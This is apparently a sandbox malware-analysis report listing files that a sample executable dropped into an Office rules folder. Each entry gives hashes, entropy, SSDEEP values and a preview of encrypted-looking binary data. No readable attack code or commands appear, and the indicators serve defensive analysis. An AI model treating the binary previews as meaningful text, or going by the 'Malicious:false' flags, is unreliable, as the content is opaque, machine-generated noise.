                                                                                                                                                  MD5:9C1DDB8C6CAF2B0D02917866FAD216DB
                                                                                                                                                  SHA1:C46060319E3265FCC2B194DDC79F776064E6E429
                                                                                                                                                  SHA-256:FD3296D9C36FB262F13BE0A66BB38BC2FA9AE28D7B8C101946FA7DFF9A15E7F7
                                                                                                                                                  SHA-512:6BB05EF6520E73570BD6920091393D440F5B8F8E1A0E9BBC4F9ACD443F2C36DFFB8599948735721B9C0E5B77114624A235D498B08B6969F82219878B1227269A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.V.z%.k..Jz....X..U..Ua.....b.....\..P..1P...."ia.....d..@/.ke.>..,~.@."IBS.h/...Ys...)l.B.V..N.}....9..:.p..Bwy..n.i/.'.M..,.m....Lk.fX.V<..S...Q..&5.....`:.....p.nA..I.jDZg.S.~lE.....mY...?.....E~Yu(..f...2..5l.\.....4.......H.?/.....S..}.."y6.3.\...M......x36^3w,.~.XB..P%...A..a.......-..7.tDe6?..%..7ZNY...[x.^L...m..){..*....m...;.'\s9+..X...\X!...).7.e..i.`..k.cr.#.........iDFm....4?.0.....e...4H.]...e.tO..f..yZ.n ..%.g.z]....c..:..oa.\..h.. ......m.2.N..9...P....\.cX.M8^|.D*.3.<....G....I...2.4..7....)......5.4KV.B....x..x.g.c..V..*&.<.Z....p..Z.H.b..6..y...*.2.....foH..!\$ri#..._^{.....;Sf....A.. .....d.z.....<.D...:L?..;...~)@ad..`.@....D.Z~.c.E..).D..T.g0ut.(..`....6......R......P..xo6.z}...1^)_.<.. .h.}.....2.....b.-.w..4.s....K..z.F.."...S...*.........7...(..|_..c.?.z.t'...k.....}.\.\."7.O..6!......2adf.yS..uD.....L..c.a.rJba..T^.!l....x..>..1..K.?g.......].....d......h.....@..4.......M.hUg.........+...fC]..p.Ym.C.y..].3H...U.}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700200v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1689
                                                                                                                                                  Entropy (8bit):7.89707961125595
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ilmJhvQRp+Zw27G/URXhV8Dml2UgQ7HvjM9QrVptBzyD:iQJ1QGJGM9hVuLU5bj6Ku
                                                                                                                                                  MD5:E7117868EF72122FA41337796DE5021E
                                                                                                                                                  SHA1:6AD5EA0BC10546BC0181971535EF61AD66D53CB9
                                                                                                                                                  SHA-256:F8C864059DA8137F17FB962B7ECFE2F6C2B2B3F770A88086F138ECD3B632D964
                                                                                                                                                  SHA-512:592A9C367A63AFC965146A0B4C6CD3F6703FADC7B252CA02A470FE82495F60BE4F0F2F6E786F9E7E39368422CA35FBD02D3343FDF028797A27144036C07F104D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.e.Ez.~.."$...t.b./..LIjW.*-..s.*....Ya.^..p..Xz...#J.B..."...T..j.Et.*.k....6.`..a.....'....{.... .9\...PY.x..O.ya|....K......2.b$.O....W.Qs...|.7.........V.U;......-HJJ.....m.e..E".r.......].-....7..?\k..p..<..@C..3..)........<.X9..f..dCE...d...\...K.......>D<..&.9.n......P~.W.l..@y..vx;e92.3P.u.Q..M..H..IE..??9 .dW.X.[...$h.g..?.....(.8..`..N...6....^......Hq.M[TrT..[_.`..n....m.+...8..-..i.....c.-.GH.g..qa..w.FX..v..;3Q..V.@..gf?.1...@.t.......y(...,.KX..N..mX.dy *zV....6...g...N..}2..._xq}3.oe.w...A..Y6.&..o...*..z....:l&....M...Dr.O9jb.z[..a }........,.SM.].|...?p6.t.A-.F.s..L4..F...)..-Wb6..1.X....J.s.r..'.h.4..7..FW.4S...J.W..`...j.q.;O.....}k3Q..H...*-1.C.s.m~P.4.'.Vo.Q....H..m..E...3SpPs.,..d!a{...U3>}.v.(.............p.b]Y(R...A.a..,.V.S......d.7.....}s5Tn3.!..D.s.^.%...P*.8......c..dcOj.!z.c..W.6d.&..{}.c.X../...;...:.3M..m.....U3.s.Ygn......,..m..R."q..Y.%...M.0i?....9...P5e....A..*7..Y.......C.x.....(.U...MA..b.....K

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700201v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1726
                                                                                                                                                  Entropy (8bit):7.895337691113006
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fFEohe6YUOT0MhbAI1JFEG7bBivTHhUKMYyfkeu6f7FdLdCjQnrD:f3YzIMFiG7bBivFH3ebf7FdL4jQH
                                                                                                                                                  MD5:B687FEF01C8E3C3A28CC9AFBB13A6A60
                                                                                                                                                  SHA1:B89AD7BC54EFD2BA54ECA12C94F837EF36E83DB6
                                                                                                                                                  SHA-256:5740CC68E452EE71EF3EB779667DD6A015FBADC3138DF9E6C25C5A9F230076C6
                                                                                                                                                  SHA-512:DDA97F814C15BC1ACA0DE228D86E890F0FE82AC5BEC49F4F5574D3F1339AFA6C89B36C25C0C0C393DE98BA6ADF12E55288D6CB7D266DE9FF72272E7BC1B8B055
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmln.Lj..zd..~.. 1..8.T._....<.,.].....Q....y,.Y]....3....Z....%.^.Z<..J...-.]..!I..:.f....?...{?d.......z|.+n..^&...H....f..C..E..V..;7..u..*2.:.\R...X....e..;.....bni......|*..Z+..Ey......S.x...zd.....E...fd.'A.w:)........T.,h..2.....:_j.H_.J..O....u...q05/.........hZ^...Y..b:2..F...F..2.h)SX.`Y.......0..4}.g...N...z0E.......='Y..........a...V.wr........M..<.6...B.W...#puPV..y.>......4,.Wt7(...~....\..J..}[.?_.S.x....../.r.D..)..G!...:..G.t..@Q......M8....f........#.#.Mt.. cl..Hy.3.{a!N.a.<.1...5l...1K....)V.=.DUi...|L4c.n.U.d.#;..{+.{..r\F..:...0b.4.Zdg..>........cVB..q...!...}"w(...&Pj?.0.254.w..v.pX.R ..BQ.#."...h{T......m]..(..V.kI...[......f.......W.b]...{.R.|.....M.8..-3.F.(..G4o..'....~..5...{...c.ra.[...j.(.\.C.R......i-..s..].q..(Z.R..x.......'.%.Bq6.%..^=7H...q~..P.L.!....#. ....`..Dz.d.L5.....^\.pX.=.M...R'.Q..(H...dk-:.z......Z.X.1W.7....=J~.&e./..K@..d>.s._..;.#..>1.o,..V..s.;..g..z..=.nKJ.u.EG...._4.9o.L....o9......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700250v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1691
                                                                                                                                                  Entropy (8bit):7.870554315758246
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:vt5ci/TwZsCbDvDm62ChimWwVghsadSK+6Yv5G0o8CMQCQ6HDm3YB+pHUKUsnNpg:l5TEvbeBTugzIKNqIJ8q2wckUOjoD
                                                                                                                                                  MD5:0BED0582C54E6CFA336DE86FD20C1DD4
                                                                                                                                                  SHA1:E00717C788442E4878EAE322623D40D7BAA86829
                                                                                                                                                  SHA-256:46F7DB33629FB083D0F6D016932ED1F162DD5722865CD23DA98BBCC450984814
                                                                                                                                                  SHA-512:8A5A61FB7583AFF8986180634C1667DE7B8D1B29E7F727F128665EA37CC9B3A6E0616C61A907F7C5D650C67417E4B12B2BDC2C6D58B8F18977BA19923D3B6A6A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......u.QK{..hV...=k.UH.V/....f.p.3.....h........0RPY..E.v@....?..D..Kx9S....;FV.C%...sc...m,x...4.........P..1.rc...;7...EO..$1....r.U.fQ5.h%A.F.u...`.....xO..%.7n..4..m....<.E..=.....]CX2y].l..c.+..6.,n....W.o.].7pGXi....:.........r..u@.'p..`....KE........?.....3...D......02?.)..E+4m ..*.+(r......l....2.)....T...H....y1CF.....0_.A...sR...P..@.=....;/..+a.q.x..r.-....8O.5_..1J..y!.........h...?.slJ...-...eG...3.;............ P...M...<...+....N...4......B..6?'...#.s.~i.N.....tb.j=+..B..K..#.{.b.G.,.H..4.+.:zh].k5.."..:..o..A..oI4../g.<w..W...*.= ..>(...Z.|....yx..Pq...;...qy..a...sJ.)...D..._._..u5~.8.@...8...DC....X?..\.M.D9*cR.7..f[(...f5......&5....Yn..........Q#...]....y.c~.2.f..o'.uQkna.^..LK%..c..."......D.C..O..........%.=..?UE^..].?.~.{..W..w..S..$.G...CNCh.<4.c...*.Zn....Vm.....:!.q..P....s.Y.a..-.t,....8.. \.n....^..c.".Q.pxP...{........(7....F.k'.8Y. D.d..N.vLE..Gx.m.g..[.....f.:}a$Yl..1%........I.6..mW

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700251v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1728
                                                                                                                                                  Entropy (8bit):7.890039822756062
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:VZ9n83u5+HQ6Bel+nza0K8U5jiDniKouD:/9nm8+w60lcaDPgn7
                                                                                                                                                  MD5:2ABAFBBBC399694F2D0041D5C0F8C410
                                                                                                                                                  SHA1:3DD41DA997F9E4C6ADCF8DFE56097EF0C41A1C05
                                                                                                                                                  SHA-256:F8D5D06612FB65A1C9C99A3FD58018AB479766BFDB8521338051A67F5605A03F
                                                                                                                                                  SHA-512:15F49CB8661A8B75F08D3669EF9285EF49AEDBE03631540393F3487CE4D5ABAA0C5CC95C12F5F0FC6834F1D6EEA53D5F6DF3A44E59E8D7412FCD8E3F89151301
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlJ........M...C....(...op..}.k...V.......j+....W.H.{...,.Q.....)C.N^...'.j..K..e..~2sQ.Jw...,>.....I.`N..!.]4..C....9.9...A.|..>.o+.S..>0,.2...Y{.xp..T......{...fV....pM..)..=.L..`.....x2o...F.N.....B..4.%.}..xw#.h.yU.....)..]H.8`.UH...D..........y.DP.......L..Y1...e...VVz.c..c.....*4Q....@...a2.....b./.;o.cU@.dl....."..Q.......oa..a..l.......1y..9[..t.i..........F.c.+.....4...\f..v...SP.......l...|d`p.`"..Z6am..v.>.t?....y.D...Il.........;R\U*[u4.e[...T....)V....>B......./..F.$...2.A..=.'.2..'F.....M....i..C...a>.v.b...y.!@..p....O...R}.+........B..B...z.Gm..*.......'.3V.....K.k...d.......~%<..>..g@.2.....d.:......b.vj:e.g.4J...W.....o.6...=.Tl....@...E[.}.6...nE..3v@..j..5.....u..LA:...c...w..{....qr..q@r...a.P...l.F.Fu.\.G..e.He.....a.t/N.....N7.2..%.. .p.....I..rM-x...Q./.n.h..K..J.*..B.,..N.^...F....`.2.(..jv-.%.q?o.r>w.....}...1.....X'.9%C..sq.e.......@..........o.Vm...^.l......o.4).l.G~t.y..~E)..<U......Rp*..G....B..2.1i

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70025v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3225
                                                                                                                                                  Entropy (8bit):7.944592670760194
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:aachpLXvldDwrxAb+qn3id2+MPvhXlkNLI:jqpblaqndR35II
                                                                                                                                                  MD5:4D936E8004A0290BE1439D304DF00D33
                                                                                                                                                  SHA1:14596510422C5262FC62CF50182532917ED8BD43
                                                                                                                                                  SHA-256:9EA6760487FB0D265DFBD014741CAB8A734FB8A9E53033D41032B5A92CCDD35A
                                                                                                                                                  SHA-512:2108EDCAAF240A3E80B7ACC5273CEDB84C0FA03AB7351B533CE24CBD6E14CA928774DCA11EE93E6F23C912548D13389D042C683E0582FB98254EE98AF1AC3362
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...&@...J.+.An...z....a.(...,..".sg.UQ.n....,3dA.....x.wg.zSbW.6'..U/FK}.G...G...$.C...A09..|-.&|.)............4s..9...<..:J..G<....DL#. ..v..XM^}...b\u*...&R.P.....{x..h..2........8_]R.C.~.........rj.u_:.).......&5L...Q.P....(-..d_w.t..w.n.H.).p.{..\..b.-.6'.4....5.B\..Xi...h.z#.u.....-Ap...;.#.(......\.....Q0...G...|d...T.0B..S6w96..K..YJ..G.2.'a_S.n...)`...1.q.....j..2QJS...|...W..I.Z5..B[?.....M..\.u.+qH..OZ.!|s.C#........'GN">0.......,.s....;...c..&.X0..d...`4..f`...f;_.t\...il.0....#.>.]{.SNg.F.......>..bf.....~...A..O.!...Ws.^.0..P.}..sP......W..g#O.N$....'...:.HD......j...*. ..nR..%......Hp:W6.S..E....}.a....^...........-m...nzm.v.{....,..^R...T74&..m&..B..}..dw.~.4.'y....;.....l.6'.#....=...,y.$..(........ ..',............H...n.....nE......T.j.....}1..J.jo...j.....fG...\6..2..]..4.j4d2X..N..=...{.z`..+.Ru.....S(.;i...5.....o.....2...........4.....dr......V?s..qJ.].@0..x.........8'..>g....u=du...4....|z...C.A~..+..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70027v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):851
                                                                                                                                                  Entropy (8bit):7.751756527240239
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:40Pi2J8s2fyA7PIQmtyHWT2YelSlS0Tm2bD:40Ptz9iPIQmtyHWT2YeIS0JD
                                                                                                                                                  MD5:6800D3DF6D6942A9325456AB10F5CF2E
                                                                                                                                                  SHA1:9BADD18725D1A59447BC6CB7D3CFDCD690324788
                                                                                                                                                  SHA-256:045A4881632AD732D2BFA2DF84EDFC9B602A0CE489967B230BB57E197E89B23B
                                                                                                                                                  SHA-512:7F23EE97DF2A78D922C9D33B5D4D0DB1554AAA9BEA2969F1D48BE2A815D34E0556F5A8E4823AACACFFF5A345022918DB2DD57A320E4FAB1F40D00EE2A9734FE5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....P2v.\..8.......v.g....a..eQ-.+..D.&...w....'.......JN.9[...Q.....^G....6..R39(.......r....<."c'...A..Xn...../xd.~T.z.(PE.q.M.pFY...P...N.............r.7.d....07./...gZ..1..$..IR.!?..HLI.:v..D.n85..G.....<..tg].Pi.K....x...vj......8.*.@...>YKo..#rj.%s.5.C.(.....9....'..=.9_..;*.....k.~...7..gv...PY.....I"(1i....U.'jC...xV....=SJ-..p..z[......]$....k..Q...]..........\t.....-...:.......I.;.}.....8f.@%....1.y...Kt.8..7z.q}.}......-.... .l>0xj.".a...H}Hc*'.*..-...8..p....s:3..k.j..j.....W..=.v/0..6s....0... ....').j..#Q....(/..udd..h.......E.8.tp......\T.3?...n...Z.=I(.}.o..K..JS....H93_.3.hu..9.GBW.....~..:.>KX.......?|...=:.s,..7....g&....q.....,....O......u..)..W.v....L...X..ax...|}..Gi.s...2.$&.<..s.0;...F}.PmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70028v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1205
                                                                                                                                                  Entropy (8bit):7.80154856388171
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:5WoVNtZKfqVqQl/ha0Nxfl/ys95CXFgfG+oqZE4m7SFft2bD:5PKfe/hjH9askaG3qESFfGD
                                                                                                                                                  MD5:25E0E015BEDDD997C42966D4E99CF3C2
                                                                                                                                                  SHA1:B68667A9DE25A5E421E3CA3D88A0F24083FB5110
                                                                                                                                                  SHA-256:D1DB2AC0CB5871DAAAB6090C28B524CC2B85C04AD822DF3DA0E244F177C41D40
                                                                                                                                                  SHA-512:628A86D6702C0BA9CA2EA210A5EEF132AE3E43235EF4D6D8D09AED6A5ECD3DD74EE35C92CBA91FAB860B9BCFB3CD2DF4AFF618CCD8DA6A1F327FF0C000140C2A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.x@.M.!..qPV..f.\_.,...a......_a..X.=.X9.|.lP.......d?z.PF(PGE....:p2.t..y#8H.V]..a..-.8.\...8........y3+.....{N.......i.,V..L....E.OB.......4.No...B..pM.nA.!z....' ....,..1..&...g....\j.qj.k4U.^h.E.....a&aW..u...)(.=d....l../WFz.l......nbL....9..M.....`l...sy54..@N..bFYA.H.......Z.Ztb..j=g.>.Q.....E.K.'...Pj....t..0.N....'.W.+G-........7~.Q.Gn.'./S...d. .>....|@o.i.`j....^..e....VO....E...}....&...~.G..f..C......Pm.".S..dd6G...leb..,M...t.|..6....$.01...!:..Y1.....Cws....$...;.D..A...l..e.....3w.x..>f.b/...7.R.F..=...].E.>.E..j....:...<z[/...M.........@...."...4;k_.j..J...whN.q._a..jsv{..h..7.ls).A/.4P...%"....-<+....W.....P(A..)..Mx.o]?r..\........p-.Yzg.G.\.E\~.......{...^.*1M.A...F...U8.1...t.6..gq%....b..0..a..[.(.....(.tA.P9..a.x...adr.';.....;..d.:bo[...p=z..B....y..=.y.?.....e.N.S...%.m....HKaj.l.!}..0N{qF..@p.%.[Ss.DxV...<L9C..1.K|.......D...a..y.}.x.c..p....K.\K....aH2....E.X.n.f....=[o...(C)x..Ol.z..eim...B...F..B..v.....9...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70029v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1004
                                                                                                                                                  Entropy (8bit):7.800290641918589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KmmpoyEzFrAeG8W/ZwiqH3P3MrXwnJtw2bD:CorxRwZwVH3PpjD
                                                                                                                                                  MD5:B0F8EEA21A65F275F8FAEB71CA75D151
                                                                                                                                                  SHA1:EC5C308CFA22EF33655F34C2C3746FE318CA4333
                                                                                                                                                  SHA-256:DAF70A6B6BD810AC30621792EE59B5564870C3602493B4A4423A447BD1B279FF
                                                                                                                                                  SHA-512:BC883A67A45058D3201E4E5C0BF84154D50E038F62FABC109ED52FA96CBCCCFA57B3BDBC5D4E1183A4BD988B88D29E9D69CBC988B494196A7F486F3F7ED69E9D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..PZ.!+.....<aMDu.Z..../".....+.......h.\..s....i...|(........3.m.K..w.e..n.f...es.K..W.V...O.r..-6.G.....Q......4..].*HrATW.^.`..."....Kwd..^.yZ.....>g.O,{t..:.G..;Q2.hz..Sp.mY]_.....F.../..u+....d.x..Sm.D..3.C...<e[.7.w.H....=..'T@A.'2....5/C. .l...F....F.......1J...;..........fe.....%8.....j._9k...M.*.!./1;.f....}...."ko.I...g.....hK8.3.m.:.L...8..yB......*.M(...Y...4.PF.e.,...j.K3.n......on...[.<#3h....i.t...i;....d.^t~[.]..<.fg4.N.n.......L..%.r..o@w..=K.nM..o.......Z:.W...X....XZ.HQ^.(-..$.Ag....2\.#......d...N1.[..&...vP^t..Q..b4u...+.0.......rz.|....j...} ..N?..0.DI...^.M..V.-,..#8...~.F"(..4...*..[ ....K.........wi...PU.y{....^.].......U..X..*B..*.x..\b...wVl...t.DPf..j:v...+i.D.Q[0.q..LN.V......w.N;....g.......Dm.q..!....4.....^j.....z.3.}.........d..$.lb>._X.N.g0\.._)./f....I.$_."m. .D..F...;d.:f.9.g..G.....S..,IP....MHSjp..d..R..F...H.p[?>..T8._..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700300v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1697
                                                                                                                                                  Entropy (8bit):7.873969414077627
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:r1RGott89orFjXeFPEW5zdoNgF1w360Zx+miFbV1wD:PGof86ZMPEW5zdygXo3xjiK
                                                                                                                                                  MD5:0E7DEAF2BE6AF7903E948BD2C2679244
                                                                                                                                                  SHA1:59CC24ADC5BC0B552457F8D41D2BE279E672B822
                                                                                                                                                  SHA-256:96558A767B1DE890BE584A843DD506ED054FA7716A33BE26EFD9FE31091C6230
                                                                                                                                                  SHA-512:A16715B424316FD54B3130EFB7BA090D6B778BB6FE8C7DF91A3B714C7DE463129F39A81A94A6D4011682DD7A9618EC37C1B818CC62BE9FF8BAAD92B702A4B366
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml)...8.%..Q..zj."a>%BmUC.0.s..L.s.!z.....gQS.l..q.O.Z.5......A%.@'..H..t.....i..>...@..1mM`....o..ki..+. ...gI..8...u.6.h......%~.V.../..d..;.I...#|.!9.'UZ... .k.)H.X.;....UlMz2w2@..$....Y....K....3..+.).8.7.H.SHScd..Vs.IB..i.,+jD..B..8.....qHd.4.......de.Pa.8.g....d.Nds....G>....i.R......`Q.~.....:.._%_...N.......D...+C>.5...K."..4...!].b.KU..ymTU....J.iH..W.!l7.3.A.....@.....L........Umkc.).......v.Z,.!~.I.^.../U^.B./....b...#.p...A.....t..{p......@)..c:T../..K..&.l7.Mw..^..U.............6....T..;....ml.'....6R.....V.9-Z..HC|._={...q.....A*b m1.t.!..h........M..2_..l.=..2j.m.....p...N..*.=.....=.iFEL..[.F'b@m.l...wj........%.=.F....>..5....V...9.I.*i..yPR....(.V.8..(lW...o.\.:0.!kihuky.Q..d7......H_V..j.k.$........1.C....v....r5QkK..I|1..!....,...`..}R..IrEq7%.P}.n...!..6.d+.g.r.(58+.vt9...."S....i...m...V.V...g.xg;.`..8.\.=.mqZ..-...ch..Kx....GdU.\.......Y..H.....D.+...Km..?...2..(..S..Xd..B\q5azzV..J....H.ao....._!t.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700301v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1734
                                                                                                                                                  Entropy (8bit):7.88403479296034
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Ku4OIuuJ5RvEgxWYnvrOqPp4fjDQe9C3pD:fIpdE8WYnvtOLLE
                                                                                                                                                  MD5:16A9287EA8F68BCCB82F6EA0C7D16A62
                                                                                                                                                  SHA1:C7DAEA77D43A93B88C408C889013DFDD37425602
                                                                                                                                                  SHA-256:CA9462C2E6AC6DF8D45B1EAD31717BAABD6FBD055C26BDDA07F3030F6ACC0A14
                                                                                                                                                  SHA-512:88B068786B41CF0658695856095850671BA7602957047FEBC969990C3905D2FB55DDDF5669B6E6436BFE881B768B2A0CC6E1D6894B46BEC9A6573E082B1AF118
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...I......Z........N=...:P8...(.._3.M...b.Kry.K..>..pk...M...>.9l..&.^.C..Y.........9t0..*.>1.$..`...s.7=x.0.R....u.21.{S.c...E3R....F...).\.4.`.w.o......~.}.w...LB.F>......6.jw......d.F...v...v.<.Md..[.`.....2....?.....HZ..{.|...e)../.....n.}v.p.I..^.A..*..o...D.......Y...|.M.Bp3.K.".$mD.^...'.1!..f....g.].;8......ET.x.4>..,F....}6........<..hq...f_M.E|...M$..\......*uv..,...sZ....W.....h.......W....]..n,zs..;|...nRM..h.".ZEE!..Ms.\..a.%1.3.v.......;I..v.5s.$......Je..:W.On...Y.V..M.iw.=p....;a.zm....teIC.....*)..~g`..a.._.".c.F..z.....^s....~o..rc..lX..."^..;E..6.n`....]..b.7F.x>..c.`|..0.....QoIU.PY.......{.+....1.!C.^FZ.p...G....=q.....(.Z.*.+p....)z.....SI.....8.x.W..U...d..7.^D...<".O...a.s....A=.o>z/.\j.#o'.h..zy... Fj.xQ>T.QWO..Ya......B1.......Z..L...$6..b_9i\.+N...-g..4...;..b....#-....>..k.....E.0F.e....]`.|".C.~...2$.....kc..f.K...Nu...z......e........cT.E......O7E.r.29N6..V....f. 1.Z..}..\..?[..9j.C...\.4.w..kS.../

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70030v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):771
                                                                                                                                                  Entropy (8bit):7.714215288293129
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:G3FPajGZ+HrC6LSnkQnvkagzPamRltw4dG9Va/uO6VJJYZ3T1pvSUdNcii9a:G1POI+WLn+agDt+s/GYJpE2bD
                                                                                                                                                  MD5:E0B88D1AB12E0A95F158296028BE1D3A
                                                                                                                                                  SHA1:08CC3B2906F28E16B0AD803EE186126A57EA23C4
                                                                                                                                                  SHA-256:6B49451B9B8917E5AF92575C48A43F8A91603AB7DC0E9A9C979A6A7A70B83D9C
                                                                                                                                                  SHA-512:420FDAF2FB8BEE9F23A56CA7FB3201FD6B8FB84DB53B22E59CD4062DDD9105DB5E69C316BBFE6170D4CA7170D2FB7144892C665268917FCFE3E52C53EE31E2A4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlB..".....]..cE..~I.>.7\l...lu.......:. ...s...U..ku..Q.Ae.#.....W...4..H\?....n..b+l.38P{.....L.......>...rojy..p.`,s.R.M.Xi.....(..b.O.9..l.......E..b....q.4_.a.&v[u,.u..#z.....&]H.pr; [e.5...\}.K...|.[...........|..rb..RK....}`.*... ...3....d%.....l..7.......p..R.Cm..-Q|..._..H..............2.,...).. 7.`..!{..H>.M.V..n>42Xa.....'....i&$...'vy..5....b.Q..de..q.fmN....*..w.....1.Dk..D......K.......l?......d.7N..]s.t..F!........G.__..0d.YB.Z...(...Pk."%.~RHU.w-..;i....+KR....e.C...4.!.......f.6...2.e......Y...Bw.>T$.....aERL..P~9t..;.."..tW.+....@%+..U/sAO...5C..#....[......S"...X.......+(pj..3..9+UBs...Y.z....V.#nhLS.../.O<|.3...@.+Q.@.zQsmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70031v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):774
                                                                                                                                                  Entropy (8bit):7.72074187533749
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:cIrViTs8nX4jvAdq8IoWRfO5i1k/MHrERPy4KMTMRU0+NQgFwVG7KMUFlU5eSUdV:DVb8zYoafmEU64KKMO5Nw9MUFlU/2bD
                                                                                                                                                  MD5:19FE10AA5C8BC07A9FE14AA293C1B7E2
                                                                                                                                                  SHA1:8FC6690A8865886FC09111494B9A8D527C40517C
                                                                                                                                                  SHA-256:2988FB56AF0699FEBACA69A2A5B14F4B9BE2659F128645F0AC497B799609FD0B
                                                                                                                                                  SHA-512:DEDE2A10A8C424442B71362D33E3F545616566011EA268D2DF966A919E3C244A2BAC5861B03C77D3C256909E94A2C1B6C2D2DD7C5F9259F0DCCA6DDDCC348EBF
                                                                                                                                                  Malicious:false
